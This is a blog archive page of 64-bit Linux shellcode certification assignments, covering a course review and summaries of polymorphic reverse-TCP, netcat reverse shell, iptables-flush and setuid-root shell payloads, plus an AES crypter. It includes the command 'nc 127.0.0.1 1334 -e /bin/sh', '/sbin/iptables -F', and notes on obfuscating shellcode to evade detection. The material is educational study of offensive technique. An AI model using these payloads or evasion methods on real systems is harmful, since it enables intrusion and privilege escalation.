Skip to main content

Posts

Showing posts from March, 2017

SLAE64 Review

This is my review for the 64 bit edition of the SecurityTube Linux Assembly Expert course and certification exam. http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html I found out about the SecurityTube bootcamp series of videos while reviewing several blog posts about the OSCP certification . I did the Assembly Language Primer For Hackers video series while attempting to follow along on my 64 bit version of Kali Linux. Then I moved on to the Buffer Overflow Primer video series. I was finding it a bit difficult to complete some of the exploit examples on my 64 bit Kali. After completing the Buffer Overflow Primer I was longing for more. Then I bumped into an advertisement for the SecurityTube Linux Assembly Expert course and while reviewing that I discovered that there was a 64 bit edition. I watched a couple of the sample videos and realized that this was exactly what I was missing. Vivek Ramachandran does an excellent job of exp

PolyRevTcp1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) Original Shellcode: Metasploits linux/x64/shell/reverse_tcp Original number of bytes: 68 Original number of nulls: 3 GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyRevTcp1434.nasm My version: Number of bytes = 65 Number of nulls = 0 PolyRevTcp1434.nasm Intro When I studied the Metasploit payload linux/x64/shell/reverse_tcp I could see that there was opportunity to reduce it's size. Furthermore it had nulls in it which quite probably means that it would need to be encoded which would further increase it's size. So  I thought I would take a stab at reducing it's size and removing the nulls. Testing Download : wget https://raw.githubusercontent.

Assignment 7

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) Assignment 7: Create a custom crypter like the one shown in the "crypters" video. You can use any encryption algorithm. You can use any programming language. But demo the encryption and decryption end to end. GitHub Link : https://github.com/rtaylor777/nasm/blob/master/Encrypt1434.zip Intro For this assignment I decided to use the Python Cryptography Toolkit (pycrypto): https://pypi.python.org/pypi/pycrypto The encryption used is AES and the mode used is AES.MODE_CBC. The password is hashed using SHA256. Quickstart Create a directory to extract the files into: Download the Encrypt1434.zip file: wget https://github.com/rtaylor777/nasm/raw/master/Encrypt1434.zi

NetCatRevShell1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) GitHub Link : https://github.com/rtaylor777/nasm/blob/master/NetCatRevShell1434.nasm Published : https://www.exploit-db.com/exploits/41509/ Number of bytes = 72 Number of nulls = 0 NetCatRevShell1434.nasm Intro  The NetCatRevShell1434 does an execve system call to run the command: nc 127.0.0.1 1334 -e /bin/sh I came up with this version while doing an assignment to create a polymorphic version of a shellcode that someone else had created which did basically the same thing. As usual when creating a polymorphic version I start out by rewriting the code and making it as small as I can. Then the code invariably increases in size again while I attempt to obfuscate it (make it har

PolyNetCatRevShell1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version:  http://shell-storm.org/shellcode/files/shellcode-823.php Original Size: 109 bytes My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyNetCatRevShell1434.nasm Published : https://www.exploit-db.com/exploits/41510/ My version: Number of bytes = 106 Number of nulls = 0 PolyNetCatRevShell1434.nasm Intro The PolyNetCatRevShell1434 does an execve system call to run the command: nc 127.0.0.1 1334 -e /bin/sh Polymorphic This is a polymorphic version of the original author's code which does basically the same thing. I rewrote the

PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php Original size: 50 bytes (don't believe what he says :) My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm Published : https://www.exploit-db.com/exploits/41503/ My version: Number of bytes = 47 Number of nulls = 0 PolyFlushIPTables1434.nasm  Intro This shellcode basically just executes /sbin/iptables -F without any other parameters. man iptables "-F, --flush [chain]               Flush  the  selected  chain (all the chains in the table if none i

PolySetuidExecve1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-77.php My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolySetuidExecve1434.nasm Published : https://www.exploit-db.com/exploits/41498/ Original Shellcode bytes = 49 My version: Number of bytes = 31 Number of nulls = 0 PolySetuidExecve1434.nasm Intro This shellcode when executed will first setuid(0) and then execute /bin/sh and provide you with a shell. The purpose of calling setuid(0) is, suppose that you have managed to inject this shellcode into an executable that is Set-UID root. I

Assignment 6

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) Assignment 6: Take up any 3 shellcodes, 64 bit Linux ones, from Shell-Storm and create polymorphic versions which do not exceed 150% of the size of the original shellcode. Bonus points if you make the polymorphic version really obscure or maybe even shorter in length than the original one. Concerning polymorphic code detection : https://www.fp6-noah.org/publications/papers/nemu_raid07.pdf https://www3.cs.stonybrook.edu/~mikepo/papers/nemu.virology.pdf I have decided that since these blog posts tend to get rather long that I will create a separate blog post for each of the 3 shellcodes that I will choose from Shell-Storm and I will simply put a link to those blog posts here. T